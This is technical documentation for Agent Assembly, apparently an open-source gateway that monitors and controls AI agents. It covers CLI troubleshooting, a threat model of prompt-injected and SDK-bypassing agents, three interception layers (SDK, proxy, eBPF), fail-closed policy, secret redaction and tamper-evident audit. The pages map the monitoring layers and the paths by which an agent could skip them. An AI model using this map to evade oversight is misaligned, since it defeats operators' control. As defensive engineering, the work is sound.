| COMPONENT | VERSION       | STATUS      |
+=========================================+
| cli       | 0.0.1-alpha.5 | -           |
|-----------+---------------+-------------|
| gateway   | -             | unreachable |
|-----------+---------------+-------------|
| api       | -             | unreachable |
+-----------+---------------+-------------+

Cause. The CLI defaults to the SaaS control-plane API on http://localhost:8080. The local-mode gateway serves its API on 7391, not 8080, so the default target is unreachable.

Fix. Point the CLI at the local API:

$ aasm --api-url http://127.0.0.1:7391 status
Agent Assembly Status
─────────────────────────────────────
  Mode:      local
  Gateway:   http://127.0.0.1:7391
  Storage:   sqlite
  Version:   0.0.1-alpha.5
  Uptime:    2m 24s
  Health:    ✓ ok
─────────────────────────────────────

To avoid repeating the flag, save a named context with aasm context or set the API URL in ~/.aa/config.yaml.

`aasm gateway status` says “not running” even though local mode is up

$ aasm gateway status
Gateway: not running

Cause. aasm gateway status tracks the legacy gRPC gateway via its PID file. A gateway started in local mode (aa-gateway --mode local) is a different process and is not reflected here.

Fix. Check local-mode liveness with the HTTP status instead:

$ aasm --api-url http://127.0.0.1:7391 status

or hit the health endpoint directly: curl http://127.0.0.1:7391/healthz.

A dashboard page loads but its tables stay empty / skeleton

Cause. The dashboard SPA served by the local-mode gateway can render its chrome and page shells, but its data endpoints (/api/v1/fleet, /api/v1/policies, …) are served by the SaaS/cloud control plane on port 8080, which is not part of the open-source local runtime. With only the local gateway running, data panels stay empty or in their loading state.

Fix. Connect a control plane that serves the /api/v1/* data routes (the hosted backend), or use the CLI (aasm agent list, aasm policy list, aasm cost summary) against the local API for the same data in the terminal. See Observe in the dashboard.

`policy validate` prints “Unknown key … will be ignored”

$ aasm policy validate policy-examples/medium-risk.yaml
warning: tier — Unknown key 'tier' will be ignored
warning: rules — Unknown key 'rules' will be ignored
warning: notifications — Unknown key 'notifications' will be ignored
Policy is valid: policy-examples/medium-risk.yaml

Cause. These are warnings, not errors — the policy still validates. The keys tier, rules, notifications, and similar are not part of the schema the gateway enforces; the supported spec sections are network, schedule, budget, data, tools, capabilities, approval, and scope.

Fix. Move the intended behaviour into a supported section (e.g. express allow/deny via capabilities or tools, gating via approval), or ignore the warnings if the extra keys are intentional annotations. The capability-policy.yaml example validates with no warnings and is a good reference shape.

A wildcard egress host is denied in `policy simulate`

If aasm policy simulate denies a host that your *.example.com allowlist entry should permit, this is expected: the simulator’s decision path uses an exact host comparison, while the live aa-proxy uses the glob-aware matcher. Confirm the host against the running proxy rather than treating the simulation deny as a real block — see the caveat in Enforce an egress policy.

Quick reference

Symptom	First thing to check
“failed to spawn aa-gateway”	`aa-gateway` on `PATH`?
“–policy is required”	Use `aa-gateway --mode local`, not the default
“unreachable” on every CLI call	Pass `--api-url http://127.0.0.1:7391`
`gateway status` “not running”	Local mode ≠ legacy gRPC; use `status` / `/healthz`
Empty dashboard tables	Data API (port 8080) not running locally
`validate` warnings	Unknown keys ignored — move into a supported section

Last updated: 2026-06-11 by Bryant

Security Model — Overview

Agent Assembly governs AI agents that you do not fully trust, running inside processes you do not fully control. The Security Model describes what the system protects, against whom, and how — and, just as importantly, where it refuses to place its trust.

This section is the why. For the how — concrete crates, types, and data paths — follow the cross-links into Architecture.

What the Security Model protects

An AI agent is, from a security standpoint, an attacker-shaped component: it executes language-model output, calls external tools, opens network connections, reads files, and spends money — all driven by prompts that may be adversarially crafted (prompt injection) or by a model that has been compromised or simply behaves unpredictably. The Security Model exists to keep that component inside a governed boundary. Concretely it protects:

Tool and capability use — an agent may only invoke the tools its policy permits. Denied tool calls are refused before they execute.
Network egress — outbound connections are constrained to an allowlist; exfiltration to an arbitrary host is blocked.
Credentials and sensitive data — API keys, private keys, and connection strings are detected and redacted on every path before they are forwarded or persisted, so a leaked secret never lands in an upstream request or an audit record.
Spend — per-team and per-org budgets cap how much an agent can cost; a runaway agent is denied or suspended when it exceeds its limit.
The audit trail itself — every governed action produces a sanitized, tamper-evident record, so the system’s own evidence cannot be quietly poisoned with raw secrets or per-event noise.

Defense-in-depth philosophy

The Security Model rests on three principles, each developed in its own page.

1. Layered interception — see the action before you can govern it

To govern an action the system must first observe it. Agent Assembly intercepts at three independent layers — the in-process SDK shim (aa-sdk-client), the sidecar proxy (aa-proxy), and kernel-level eBPF (aa-ebpf) — ordered lowest-latency-first and highest-detection-authority-first. The layers are not alternatives; they stack, so an action that slips past one is caught by the next. Coverage is the union of the layers you deploy.

2. The SDK is not a trust boundary — the runtime is authoritative

The fastest layer runs inside the agent’s own process, which is exactly the component we do not trust. So the system treats SDK-side checks as best-effort advisory only and re-does the authoritative work at a trusted chokepoint: the runtime (aa-runtime) re-scans, re-redacts, and re-normalizes every event unconditionally, and the gateway (aa-gateway) is the sole source of truth for policy. This is recorded as a formal decision in ADR 0002 and detailed in Trust boundaries.

Invariant: nothing the SDK asserts can shorten the trusted side’s work. Position — not code — confers authority. The same aa-security scanner is advisory inside the SDK and authoritative inside aa-runtime.

3. Fail-closed by default

When the system cannot make a safe decision, it denies. An empty policy cascade returns a fail-closed Deny (aa-gateway/src/engine/decision.rs), and a secret-bearing field too large to fully scan is redacted whole rather than forwarded raw (aa-runtime/src/pipeline/enforcement.rs, OversizedPolicy::RedactWhole). See Protection and enforcement.

How the pages fit together

Page	Question it answers
Threat model	What assets, adversaries, and threats are in scope?
Three-layer defense in depth	How do SDK, proxy, and eBPF compose so nothing slips through?
Protection and enforcement	How are policy, fail-closed, egress, scanning, and budgets enforced?
Trust boundaries	Why is the SDK untrusted and the runtime/gateway authoritative?
Audit and assurance	How is the audit trail kept tamper-evident and free of secrets?

Last updated: 2026-06-11 by Chisanan232

Threat model

This page enumerates what the Security Model defends: the assets worth protecting, the adversaries who threaten them, and the concrete threats each control answers. It is specific to Agent Assembly — the system that governs AI agents at the three interception layers and a central gateway.

Assets

Asset	Why it matters	Primary guard
Credentials & secrets — API keys, private keys, DB connection strings	Leaking one grants an attacker the agent’s privileges across third-party systems	`aa-security` credential scanner + redaction, run authoritatively in `aa-runtime`
Tool / capability surface	An unauthorized tool call is arbitrary code or data access on the agent’s behalf	Gateway policy engine (`aa-gateway/src/policy/`, `aa-gateway/src/engine/`)
Network egress paths	The channel through which data is exfiltrated	Network-egress policy (`aa-gateway/src/policy/network.rs`) + proxy MitM (`aa-proxy`) + eBPF SSL uprobes
Spend / budget	A looping or hijacked agent can burn unbounded cost	Budget control (`aa-gateway/src/budget/`) — deny or suspend on exceed
The audit trail	It is the evidence of what happened; if it can be poisoned, accountability is lost	Write-boundary sanitizer (`aa-gateway/src/sanitizer/`) + tamper-evident publish (`aa-runtime/src/audit_publisher/`)
Policy as source of truth	If the agent could author its own policy, governance is meaningless	Policy SoT is server-side in the gateway; the SDK cannot mutate it

Adversaries

The model assumes the agent’s own process is not trusted. The relevant adversaries are:

The prompt-injected agent. A legitimate, SDK-adopting agent whose model has been steered by adversarial input into making tool calls, network requests, or data accesses its operator never intended. It is cooperative at the binary level but hostile at the behavioral level.
The compromised / modified agent. An agent whose code has been altered — including one running a patched, outdated, or stubbed SDK — that deliberately tries to suppress, weaken, or skip the in-process checks.
The bypassing agent. An agent that ignores the SDK entirely and makes raw syscalls, opens its own sockets, or links TLS directly to avoid the fastest interception layer.
The careless integrator. Not malicious, but ships secrets in tool arguments or LLM payloads, or wires an agent to an over-broad capability set.

Trust posture. Because the SDK runs inside an attacker-controllable process, any guarantee anchored in the SDK is not a guarantee. Security must hold even when the SDK does nothing — see Trust boundaries and ADR 0002.

Threat scenarios

Unauthorized tool call — a prompt-injected agent invokes a tool outside its policy (e.g. terminal_exec, or read_file on /etc/...). Caught by the gateway tool allow/deny stage and, for MCP tools/call, by argument-level matching in the proxy (aa-proxy/src/intercept/mcp.rs).
Credential / data exfiltration — the agent embeds an API key in an LLM prompt or a tool argument and sends it upstream. The aa-security scanner detects the secret (via Aho-Corasick literal patterns) and redacts it before forward and before audit, on every path.
Network egress to an arbitrary host — the agent attempts to POST data to an attacker-controlled domain. The gateway’s network allowlist denies the request; the proxy enforces it at the wire even with no agent code change; eBPF SSL uprobes observe the plaintext if the agent bypasses both.
Policy evasion / SDK bypass — the agent disables, stubs, or skips the SDK scanner, or asserts an “already clean” marker. Defeated structurally: there is no trust marker on the wire, and aa-runtime re-scans unconditionally. This is proven by the bypass-resistance suite (aa-runtime/tests/aaasm_2568_gate_verification.rs).
Runaway spend — a looping agent issues unbounded LLM calls. The budget tracker denies further requests once the daily/monthly limit is met, or suspends the agent, per action_on_exceed.
Audit poisoning / secret leakage into logs — a sender emits raw prompts, full payloads, or per-beat heartbeat noise into the audit stream. The write-boundary sanitizer strips banned keys recursively and collapses heartbeats before anything reaches audit_logs.

STRIDE mapping

STRIDE category	Threat in this system	Control
Spoofing	Agent claims an identity / lineage it does not have to widen its policy scope	Gateway resolves agent lineage server-side from registered context; the policy cascade is keyed to it (`aa-gateway/src/engine/mod.rs`)
Tampering	Agent forges event fields or asserts “already scanned” to skip enforcement	No trust marker honored; `aa-runtime` re-scans every event; the sanitizer drops unknown top-level fields (`aa-gateway/src/sanitizer/`)
Repudiation	Action happens with no trustworthy record	Tamper-evident audit publish to NATS, subject `assembly.audit.<tenant>.<agent>` (`aa-runtime/src/audit_publisher/subject.rs`)
Information disclosure	Secrets leak via upstream requests or audit logs	`aa-security` scan + redact on every path; banned-key sanitizer as the final write-boundary backstop
Denial of service / spend exhaustion	Runaway agent burns budget or floods events	Budget deny/suspend (`aa-gateway/src/budget/`); fail-closed oversized-field cap bounds per-event scan cost
Elevation of privilege	Agent invokes a tool or egress beyond its grant	Policy engine deny stages; fail-closed empty cascade → `Deny` (`aa-gateway/src/engine/decision.rs`)

Each control is detailed in Protection and enforcement.

Last updated: 2026-06-11 by Chisanan232

Three-layer defense in depth

To govern an action, Agent Assembly must first observe it. It does so at three independent interception layers, each catching what the layers above it might miss, and routes every observed action to one central gateway for the decision. This page explains why the layers are arranged the way they are and how they compose so an agent cannot quietly slip through. For the policy decision itself, see Protection and enforcement; for how implementation maps to crates, see Architecture.

The latency-vs-authority trade-off

The layers are ordered by a deliberate trade-off — lowest latency first, highest detection authority first:

Layer	Runs in	Crate(s)	Cost	Catches	Detection authority
1 — SDK (in-process)	The agent’s own process	`aa-sdk-client` + per-language shims, `aa-wasm`	Lowest	What the SDK is wired into	Lowest — lives inside the untrusted process
2 — Sidecar proxy	An adjacent process / sidecar	`aa-proxy`	Medium	Outbound HTTPS, no code change	Medium — sees only routed traffic
3 — eBPF (kernel)	The Linux kernel	`aa-ebpf`, `aa-ebpf-probes`	Highest	Everything else, including bypass attempts	Highest — observes below anything the agent can reach

The in-process SDK is the cheapest place to make a decision — but also the easiest for an agent to avoid, because it lives inside the very process we do not fully trust. The eBPF layer is the most expensive to run, but it watches from the kernel, below anything the agent can reach, so it catches actions the higher layers never saw — including deliberate attempts to bypass the SDK. Authority is inverse to cost: the cheaper a layer is, the less you can trust it to be present.

What each layer catches

Layer 1 — SDK shim (in-process)

The language SDKs call into a thin native shim over aa-sdk-client, which ships events over a Unix domain socket to the runtime and applies pre-execution allow/deny via wrapper functions. It is the fastest path and gives the richest context (it sees the call before it happens), but it requires the agent to adopt the SDK and can be skipped. Its security checks are advisory only — see Trust boundaries.

Layer 2 — Sidecar proxy (`aa-proxy`)

The proxy terminates outbound TLS with a per-host certificate signed by a local CA generated on first start (aa-proxy/src/tls/ca.rs), inspects the decrypted request, and enforces network-egress and data policy at the wire — with no change to agent code. The interceptor returns a VerdictDecision of Forward, ForwardRedacted, Block, or AlertAndForward (aa-proxy/src/intercept/mod.rs), and for MCP tools/call it can match on arguments (aa-proxy/src/intercept/mcp.rs) — a precision the raw-bytes scanner alone cannot reach. It catches egress the SDK missed, but sees only what is routed through it.

Layer 3 — eBPF (kernel)

The kernel layer attaches uprobes to the SSL library — SSL_write (outbound plaintext) and SSL_read entry/exit (inbound plaintext) in aa-ebpf-probes/src/ssl_probes.rs — and tracepoints/kprobes for process exec and file syscalls (aa-ebpf-probes/src/exec_probes.rs, aa-ebpf/src/kprobe.rs). Because it observes at the syscall / library boundary, it sees TLS plaintext and process activity even when the agent never adopted the SDK and never routed through the proxy. It is the floor. It is Linux-only and needs elevated privileges.

How the layers compose

The layers are not alternatives — they stack. A deployment runs whatever subset fits its constraints, and because every layer reports to the same gateway using the same audit wire format (aa-proto audit events), the gateway sees one unified view no matter which layers produced the events. Coverage is the union of the layers you deploy:

the SDK handles the fast common path,
the proxy backstops network egress without touching agent code,
eBPF is the floor that catches what slips past both.

Run all three and an action has nowhere to hide — an attempt to evade a higher layer simply surfaces at a lower one.

graph TD
    classDef agent fill:#eef2ff,stroke:#6366f1
    classDef l1 fill:#eaf6ee,stroke:#3aa55b
    classDef l2 fill:#fff3d6,stroke:#c98a00
    classDef l3 fill:#fdecea,stroke:#d75748
    classDef gw fill:#e8f1ff,stroke:#5b8def

    Agent["AI agent<br/>(tool / LLM / network calls)"]:::agent

    subgraph Interception["Three interception layers (union coverage)"]
        L1["Layer 1 — SDK shim<br/>aa-sdk-client · in-process · lowest latency<br/><i>advisory checks only</i>"]:::l1
        L2["Layer 2 — Sidecar proxy<br/>aa-proxy · MitM outbound HTTPS<br/>Forward / Redact / Block"]:::l2
        L3["Layer 3 — eBPF<br/>aa-ebpf · kernel SSL uprobes + syscalls<br/>highest authority"]:::l3
    end

    GW["Gateway (aa-gateway)<br/>authoritative policy · budget · decision"]:::gw
    RT["Runtime (aa-runtime)<br/>authoritative scan + redact"]:::gw
    Audit[("Tamper-evident<br/>audit trail")]

    Agent -->|"adopted SDK path"| L1
    Agent -.->|"routed HTTPS"| L2
    Agent -.->|"raw syscalls / TLS<br/>(bypass attempt)"| L3

    L1 --> RT
    L2 --> RT
    L3 --> RT
    RT -->|"unified audit wire format"| GW
    GW --> Audit

flowchart LR
    classDef catch fill:#eaf6ee,stroke:#3aa55b
    classDef miss fill:#fdecea,stroke:#d75748

    A["Agent action"] --> Q1{"SDK adopted<br/>& wired?"}
    Q1 -->|yes| C1["Caught at Layer 1<br/>(SDK)"]:::catch
    Q1 -->|"no / skipped"| Q2{"Routed<br/>through proxy?"}
    Q2 -->|yes| C2["Caught at Layer 2<br/>(proxy egress)"]:::catch
    Q2 -->|"no / direct socket"| Q3{"Linux + eBPF<br/>deployed?"}
    Q3 -->|yes| C3["Caught at Layer 3<br/>(eBPF kernel)"]:::catch
    Q3 -->|no| U["Uncovered<br/>(deploy eBPF to close)"]:::miss

The second diagram makes the composition explicit: an action only escapes governance if it evades every deployed layer. With eBPF present, the bypass path collapses to “caught at Layer 3.”

Last updated: 2026-06-11 by Chisanan232

Protection and enforcement

Once an action is observed (see Three-layer defense in depth), it must be decided on and, where necessary, blocked or scrubbed. This page covers the enforcement machinery: policy evaluation, fail-closed behavior, network-egress control, credential scanning & redaction, and budgets as a control. Every claim below is grounded in the gateway, runtime, and security crates; for the broader component picture see Architecture.

Policy evaluation

The gateway is the authoritative decision point. The policy engine (aa-gateway/src/engine/mod.rs) evaluates an AgentContext + GovernanceAction and returns a PolicyDecision — Allow, RequireApproval { reason, timeout_secs }, or Deny { reason, source_scope } (aa-gateway/src/engine/decision.rs).

Evaluation runs as a staged pipeline. The single-policy path (evaluate_primary) and the scoped-cascade path (evaluate_with_cascade) share the same stages:

Stage	Check	Outcome on violation
1	Schedule / active-hours window	`Deny` “outside active hours”
2	Network allowlist (for `NetworkRequest`)	`Deny` “host not in network allowlist”
3	Tool allow/deny	`Deny` “tool denied by policy”
4	Tool rate limit	`Deny` “rate limit exceeded”
5	Approval condition (`requires_approval_if`)	`RequireApproval`
6	Credential / custom-pattern scan	redact in memory — never deny
7	Budget (monthly then daily)	`Deny` “budget exceeded” + optional `SuspendAgent`

Stage 6 is notable: a credential finding redacts rather than denies, so a governed action still proceeds but the secret never travels upstream. Denial is reserved for policy, egress, rate, and budget violations.

Scoped cascade and most-restrictive-wins

When scoped policies are loaded, the engine collects a cascade of PolicyDocuments along the agent’s lineage (Global → Org → Team → Agent) and merges them with most-restrictive-wins semantics (merge_decisions in aa-gateway/src/engine/decision.rs): any Deny short-circuits and wins; otherwise the narrowest-scope RequireApproval wins; only an all-Allow cascade returns Allow.

Fail-closed behavior

The system denies whenever it cannot make a safe decision. Two load-bearing examples:

Empty policy cascade → Deny. merge_decisions returns a fail-closed Deny { reason: "no policy — fail-closed", source_scope: Global } for an empty cascade — it never silently allows (aa-gateway/src/engine/decision.rs).
Unscannable field → redact whole. In the runtime enforcement stage, a secret-bearing field larger than max_field_bytes (default DEFAULT_MAX_FIELD_BYTES = 64 KiB) cannot be fully scanned, so it is replaced wholesale with OVERSIZED_MARKER = "[REDACTED:OVERSIZED]" rather than forwarded raw — OversizedPolicy::RedactWhole, the sole and default variant (aa-runtime/src/pipeline/enforcement.rs). The doc comment is explicit: “The runtime is a security gate, so the policy is fail-closed.”

Null-as-no-match nuance. Inside a single policy document, an unresolvable graph variable contributes nothing to the decision — a deny condition that references it does not fire (aa-gateway/src/policy/context.rs). This is a deliberate per-clause evaluation rule (fail-open on missing context within a clause), distinct from the system-level fail-closed default that governs the absence of any policy.

Network-egress control

Egress is enforced at two tiers. In the gateway, check_network_egress(host, policy) returns an EgressDecision against the policy’s allowlist (aa-gateway/src/policy/network.rs); a NetworkRequest to a host outside a non-empty allowlist is denied at Stage 2. At the wire, the proxy independently enforces egress on decrypted traffic with no agent code change (see Three-layer defense), and the eBPF SSL uprobes observe egress plaintext even when the proxy is bypassed.

Credential scanning & redaction (`aa-security`)

The aa-security leaf crate is the credential-detection and redaction primitive (extracted from aa-core per ADR 0002, AAASM-2567). Its CredentialScanner (aa-security/src/scanner.rs) compiles a single Aho-Corasick automaton over literal secret prefixes and patterns, mapping each match to a CredentialKind:

LLM-provider keys (Anthropic, OpenAI),
cloud keys (AKIA… AWS access key, GCP service account, Azure connection string),
VCS tokens (ghp_ PAT, ghs_ app token),
Slack tokens, database URLs (postgres, mysql, mongodb),
private-key PEM blocks (RSA / EC / OpenSSH / generic / PGP).

A scan yields a ScanResult; redact() replaces each match with a [REDACTED:<kind>] label, and the resulting Redaction (aa-security/src/redaction.rs) stores only finding metadata — never the raw secret value.

The same crate is wired in at every trusted point:

Caller	Role
`aa-runtime` (`pipeline/enforcement.rs`, `RuntimeScanner::enforce`)	Authoritative — re-scans every event unconditionally on both the batch and the violation path
`aa-gateway` (`engine/mod.rs` Stage 6, `audit.rs`)	Scan-then-redact at evaluation and at the audit-write boundary
`aa-proxy` (`intercept/mod.rs`)	Wire-level scan driving `Block` / `ForwardRedacted`
SDK / `aa-sdk-client`	Advisory preflight only — best effort, never trusted

The runtime’s RuntimeScanner holds one precompiled scanner, built once at pipeline start and reused per event — it is never rebuilt per event — and only the allowlisted secret-bearing fields of each Detail variant (ToolCall, FileOp, Process) are scanned. Variants with no free-text secret fields (LlmCall, Network, Violation, Approval) are matched explicitly with no wildcard, so adding a new detail variant fails to compile until its secret-bearing fields are triaged.

Budgets as a control

Budgets are a first-class security control against runaway spend, not merely a cost report. The gateway’s BudgetTracker (aa-gateway/src/budget/) tracks per-agent, per-team, and per-org daily/monthly spend. At Stage 7 the engine checks monthly then daily limits; on exceed it returns a Deny whose side-effect is driven by the policy’s action_on_exceed:

ActionOnExceed::Deny — refuse the individual request, keep the agent active;
ActionOnExceed::Suspend — attach DenyAction::SuspendAgent so the service layer suspends the agent.

The default when action_on_exceed is absent is Deny (aa-gateway/src/policy/validator.rs).

Decision flow

flowchart TD
    classDef gw fill:#e8f1ff,stroke:#5b8def
    classDef deny fill:#fdecea,stroke:#d75748
    classDef redact fill:#fff3d6,stroke:#c98a00
    classDef allow fill:#eaf6ee,stroke:#3aa55b

    A["GovernanceAction + AgentContext"]:::gw --> Casc{"Policy cascade<br/>empty?"}
    Casc -->|yes| FC["Deny — fail-closed<br/>'no policy'"]:::deny
    Casc -->|no| S1["1 Schedule"]:::gw --> S2["2 Network allowlist"]:::gw
    S2 --> S3["3 Tool allow/deny"]:::gw --> S4["4 Rate limit"]:::gw
    S4 --> S5{"5 Requires<br/>approval?"}
    S5 -->|yes| RA["RequireApproval"]:::redact
    S5 -->|no| S6["6 Credential scan<br/>(aa-security)"]:::redact
    S6 -->|finding| RED["Redact in memory<br/>[REDACTED:kind] — proceed"]:::redact
    S6 -->|clean| S7{"7 Budget<br/>exceeded?"}
    RED --> S7
    S7 -->|"yes / Deny"| BD["Deny 'budget exceeded'"]:::deny
    S7 -->|"yes / Suspend"| SUS["Deny + SuspendAgent"]:::deny
    S7 -->|no| OK["Allow"]:::allow

    S1 -.->|outside hours| D1["Deny"]:::deny
    S2 -.->|host not allowed| D2["Deny"]:::deny
    S3 -.->|tool denied| D3["Deny"]:::deny
    S4 -.->|over limit| D4["Deny"]:::deny

Last updated: 2026-06-11 by Chisanan232

Trust boundaries

The single most important decision in Agent Assembly’s Security Model is where it places trust. The answer is recorded formally in ADR 0002 — SDK Security Boundary: the SDK is not a trust boundary; the runtime and gateway are authoritative. This page explains why, and how that decision is made bypass-resistant.

Why the SDK is not a trust boundary

The fastest interception layer — the SDK — runs inside the agent’s own process, which is exactly the component the model does not trust (see the threat model). An attacker who controls the agent controls a modified, outdated, or stubbed SDK. Therefore any guarantee anchored in the SDK is not a guarantee at all: security must hold even when the SDK does nothing.

ADR 0002 audited the prior state and found enforcement in the wrong place — the only credential scan on the SDK fast-path was inside the SDK binding itself, while the trusted runtime forwarded the SDK’s payload without independently scanning it. A removed or bypassed SDK scanner would let raw secrets flow SDK → runtime → gateway. The decision reversed this:

Concern	Decision
Is the SDK a security boundary?	No. The SDK is untrusted.
Authoritative enforcement point	`aa-runtime` — scans, redacts, normalizes every event before forward/audit, unconditionally.
Source of truth	Gateway / control-plane — policy SoT; audit-write sanitizer as final backstop.
SDK-side detection	Best-effort advisory preflight only. No `clean` / `already_scanned` marker exists on the wire, and none is honored.

Invariant. Nothing the SDK asserts can shorten the runtime’s work. The same aa-security scanner is advisory inside the SDK and authoritative inside aa-runtime. Position — not code — confers authority.

Why the runtime / gateway is authoritative

The SDK event fast-path is SDK → UDS → aa-runtime → gRPC → gateway. The runtime is the mandatory chokepoint: every event must pass through it. So that is where the authoritative work lives. RuntimeScanner::enforce (aa-runtime/src/pipeline/enforcement.rs) scans, redacts, and normalizes every secret-bearing field, and the pipeline run() loop (aa-runtime/src/pipeline/mod.rs) calls it before any forward or audit, on every path — both the batched path and the immediate policy-violation path. Its doc comment states the rule directly:

Runs unconditionally — no field of the event can request that scanning be skipped, and there is no SDK trust marker on the wire.

The gateway, in turn, is the source of truth for policy (the agent cannot author its own policy) and applies a final write-boundary sanitizer before anything is persisted.

Bypass resistance — eBPF catches what the SDK and proxy miss

Trust placement answers “what if the SDK lies?” Bypass resistance answers “what if the agent skips the SDK entirely?” The three-layer model is the structural answer: a higher layer evaded simply surfaces at a lower one. An agent that skips the SDK and the proxy and links TLS directly is still observed by the eBPF SSL_write / SSL_read uprobes and exec/file syscall hooks (aa-ebpf-probes/src/ssl_probes.rs, aa-ebpf-probes/src/exec_probes.rs), because the kernel sits below anything the agent can reach.

This is verified, not asserted. The bypass-resistance suite drives the public aa_runtime::pipeline::run loop end-to-end and proves every inbound event is scanned + redacted before forward/audit on both paths, with the raw secret never leaving the runtime regardless of SDK behavior (aa-runtime/tests/aaasm_2568_gate_verification.rs). The “no trust marker” guard is partly compile-time — the exhaustive, wildcard-free match over Detail variants forces any new secret-bearing field to be triaged before it compiles.

Trust-boundary diagram

flowchart LR
    classDef untrusted fill:#fdecea,stroke:#d75748,stroke-dasharray: 4 3
    classDef trusted fill:#eaf6ee,stroke:#3aa55b
    classDef sot fill:#e8f1ff,stroke:#5b8def

    subgraph U["UNTRUSTED — agent-controllable process"]
        SDK["Python / Node / Go SDK<br/>+ aa-sdk-client shim<br/><i>advisory preflight only</i>"]:::untrusted
    end

    subgraph T["TRUSTED ENFORCEMENT"]
        RT["aa-runtime<br/>mandatory chokepoint<br/>scan · redact · normalize<br/><b>unconditional</b>"]:::trusted
        PX["aa-proxy<br/>wire egress + scan"]:::trusted
        BPF["aa-ebpf<br/>kernel uprobes / syscalls<br/>bypass floor"]:::trusted
    end

    subgraph S["SOURCE OF TRUTH"]
        GW["aa-gateway<br/>policy SoT · budget<br/>audit-write sanitizer"]:::sot
    end

    SDK -->|"UDS · no trust marker"| RT
    PX --> RT
    BPF --> RT
    RT -->|"gRPC"| GW

    %% the boundary line
    SDK -. "trust boundary" .-> RT

Everything left of the runtime is untrusted and can only advise; everything from the runtime rightward is authoritative. The dashed edge is the trust boundary itself — the SDK’s assertions stop there. See ADR 0002 for the full decision record and the boundary-first migration order that ensured SDK-side scanning was never removed before the runtime became authoritative.

Last updated: 2026-06-11 by Chisanan232

Audit and assurance

Governance is only credible if there is a trustworthy record of what happened. Agent Assembly’s audit pipeline is designed so that the trail is free of secrets, tamper-evident, and supports non-repudiation — even when an upstream sender (an SDK, a proxy, an eBPF probe) emits something it should not. This page covers the write-boundary sanitizer, redaction, and the publish path. For where audit sits in the wider system, see Architecture.

The write-boundary sanitizer

Every audit event the gateway is about to persist passes first through sanitize (aa-gateway/src/sanitizer/). The module’s own description states the principle: “The sender is the first line of defense; this module is the last.” It never trusts the inbound shape — it operates on the untyped JSON tree as received and:

strips banned keys recursively at any depth,
drops unknown top-level fields, counting them so a newly-emitting sender is noticed (a drift signal), and
collapses heartbeats into a single “last seen” update on the agent row instead of writing a per-beat record.

The four classes of “never store” data are removed regardless of what any upstream emits: raw LLM prompts/completions, full tool-call payloads, eBPF packet bodies, and per-heartbeat sequence records. The BANNED_KEYS list (aa-gateway/src/sanitizer/rules.rs) is deliberately a superset — defense in depth means erring toward dropping — and includes prompt, completion, llm_input, llm_output, tool_payload, tool_response, tool_args, tool_result, packet_body, packet_payload, and heartbeat_seq.

The sanitizer returns a SanitizeOutcome — either an Audit(SanitizedAuditEvent) to persist, or a HeartbeatUpdate to fold into the agent’s “last seen” field (aa-gateway/src/sanitizer/event.rs). The SanitizedAuditEvent type is a constructor-guarded wrapper, so a value can only exist after it has been through the banned-key pass.

Redaction: secrets never reach the record

The sanitizer removes whole banned containers; the aa-security scanner removes secrets that appear inside otherwise-legitimate fields. Both run on the audit path. At the gateway audit-write boundary (aa-gateway/src/audit.rs) the CredentialScanner detects a secret and redact() replaces it with a [REDACTED:<kind>] label; the resulting Redaction (aa-security/src/redaction.rs) stores only finding metadata — kind and offset — never the raw value. Combined with the runtime’s authoritative re-scan (see Protection and enforcement), a secret is redacted before forward and again before persist, so it never lands in audit_logs.

Tamper-evidence and non-repudiation

Audit events are published off the runtime via the NATS audit publisher (aa-runtime/src/audit_publisher/). Each entry is published to a structured, tenant- and agent-scoped subject derived by subject_for (aa-runtime/src/audit_publisher/subject.rs):

assembly.audit.<tenant>.<agent>

where <tenant> is the entry’s org id (falling back to team id, then default) and <agent> is the agent id rendered as a hyphenated UUID. Scoping every record to an immutable tenant+agent identity means a record cannot be silently reattributed, and routing through a durable message bus separates the production of audit evidence (the runtime, which an agent cannot reach into) from its consumption (the gateway/storage), so the trail is not rewritable by the governed party. This separation, plus the constructor-guarded sanitized type and metadata-only redaction, is what makes the record non-repudiable: the governed action and its decision are recorded by trusted components, with no path for the agent to alter or suppress its own history.

End-to-end audit data flow

flowchart TD
    classDef src fill:#eef2ff,stroke:#6366f1
    classDef trusted fill:#eaf6ee,stroke:#3aa55b
    classDef guard fill:#fff3d6,stroke:#c98a00
    classDef store fill:#e8f1ff,stroke:#5b8def

    SDK["SDK (advisory)"]:::src
    PX["aa-proxy"]:::src
    BPF["aa-ebpf"]:::src

    RT["aa-runtime pipeline<br/>RuntimeScanner::enforce<br/>scan · redact · normalize<br/><b>unconditional</b>"]:::trusted
    PUB["audit_publisher<br/>subject assembly.audit.&lt;tenant&gt;.&lt;agent&gt;"]:::trusted
    BUS[["NATS bus<br/>(durable, append-oriented)"]]:::trusted

    SAN["Gateway sanitizer<br/>strip BANNED_KEYS (recursive)<br/>drop unknown top-level (counted)<br/>collapse heartbeats"]:::guard
    RED["aa-security redaction<br/>[REDACTED:kind] · metadata only"]:::guard

    HB["agents.last_heartbeat<br/>update"]:::store
    LOG[("audit_logs<br/>secret-free, attributed")]:::store

    SDK --> RT
    PX --> RT
    BPF --> RT
    RT --> PUB --> BUS --> SAN
    SAN -->|"Audit(SanitizedAuditEvent)"| RED --> LOG
    SAN -->|"HeartbeatUpdate"| HB

The record that reaches audit_logs has passed an authoritative redaction in the runtime, a recursive banned-key strip in the sanitizer, and a final metadata-only credential redaction — and is bound to an immutable tenant+agent subject. No single compromised or careless sender can defeat the trail.

Last updated: 2026-06-11 by Chisanan232

Architecture

This chapter is the engineering map of agent-assembly — the open-source core that governs AI agents by intercepting their actions at three independent layers and routing every action through one central gateway.

It is written for contributors and integrators who want to understand how the system is built, not just how to operate it. For the system-level overview, see System architecture; for the security rationale, see the Security Model.

Pages in this chapter

System architecture — the big picture: the 28 workspace crates, the three interception layers, the gateway / API / runtime / storage split, and the gRPC / HTTP / UDS transport topology, with a mermaid system diagram.
Component deep-dives — a per-crate tour of responsibilities, key types, and dependencies: gateway, policy engine, budgets, runtime, the three interception crates, API, CLI, foundation crates, storage, and cache.
Key workflows — policy evaluation, agent registration, budget tracking & rollup, and the interception/enforcement path, each as a mermaid sequence or flow diagram grounded in the real code path.
Data flows — how an intercepted event travels from a layer through the gateway, the policy engine, and the write-boundary sanitizer into durable, tamper-evident storage.
Building & contributing — build, test, and lint basics for working on the workspace.

The model in one diagram

flowchart LR
    Agent[AI agent] --> Layers["3 interception layers<br/>SDK · proxy · eBPF"]
    Layers --> RT["aa-runtime<br/>chokepoint"]
    RT -->|gRPC :50051| GW["aa-gateway<br/>policy · budget · audit"]
    GW --> Store[("storage")]
